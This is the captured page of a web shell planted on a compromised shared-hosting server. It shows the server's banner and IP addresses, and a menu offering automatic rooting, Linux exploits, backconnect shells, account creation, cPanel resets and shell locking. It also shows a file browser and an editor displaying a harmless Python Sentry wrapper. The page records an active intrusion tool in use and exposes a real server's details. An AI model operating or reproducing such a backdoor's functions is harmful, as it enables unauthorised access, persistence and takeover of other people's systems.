Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.224.69.176
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python38 /
lib /
python3.8 /
site-packages /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
_distutils_hack
[ DIR ]
drwxr-xr-x
certifi
[ DIR ]
drwxr-xr-x
certifi-2018.4.16-py3.8.egg-in...
[ DIR ]
drwxr-xr-x
pip
[ DIR ]
drwxr-xr-x
pip-22.2.1.dist-info
[ DIR ]
drwxr-xr-x
pkg_resources
[ DIR ]
drwxr-xr-x
sentry_sdk
[ DIR ]
drwxr-xr-x
sentry_sdk-0.7.10-py3.8.egg-in...
[ DIR ]
drwxr-xr-x
setuptools
[ DIR ]
drwxr-xr-x
setuptools-58.3.0.dist-info
[ DIR ]
drwxr-xr-x
six-1.12.0-py3.8.egg-info
[ DIR ]
drwxr-xr-x
urllib3
[ DIR ]
drwxr-xr-x
urllib3-1.26.6-py3.8.egg-info
[ DIR ]
drwxr-xr-x
.sentry.conf
101
B
-rw-------
NCSentry.py
1.49
KB
-rw-r--r--
PySocks-1.5.7-py3.8.egg-info
322
B
-rw-r--r--
distutils-precedence.pth
152
B
-rw-r--r--
six.py
31.69
KB
-rw-r--r--
socks.py
29.25
KB
-rw-r--r--
sockshandler.py
2.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NCSentry.py
#!/opt/alt/python38/bin/python3 import os import sentry_sdk import warnings class NCSentry: """ Simple Wrapper sentry = NCSentry() After successfully inited class we can use Sentry debug system: Report to Sentry: SentryClient.capture_message("test") SentryClient.capture_exception(Exception("MyAwsomeString")) """ __conflict_under_version = "0.19.2" def __init__(self, config_dir=None): self.sentry_args = {} if config_dir: dir_path = config_dir else: dir_path = os.path.dirname(os.path.realpath(__file__)) self.conf_path = os.path.join(dir_path, ".sentry.conf") self.construct_args() with open(self.conf_path) as fh: self.dsn = fh.read() self.client = sentry_sdk.init(self.dsn, **self.sentry_args) self.capture_message = sentry_sdk.capture_message self.capture_exception = sentry_sdk.capture_exception def construct_args(self): try: import pkg_resources _conflict_under_version = pkg_resources.extern.packaging.version.Version( self.__conflict_under_version ) if ( pkg_resources.get_distribution("sentry-sdk").parsed_version >= _conflict_under_version ): self.sentry_args["traces_sample_rate"] = 0 except Exception as err: warnings.warn(f"Can't setup sentry default args {err}")
Close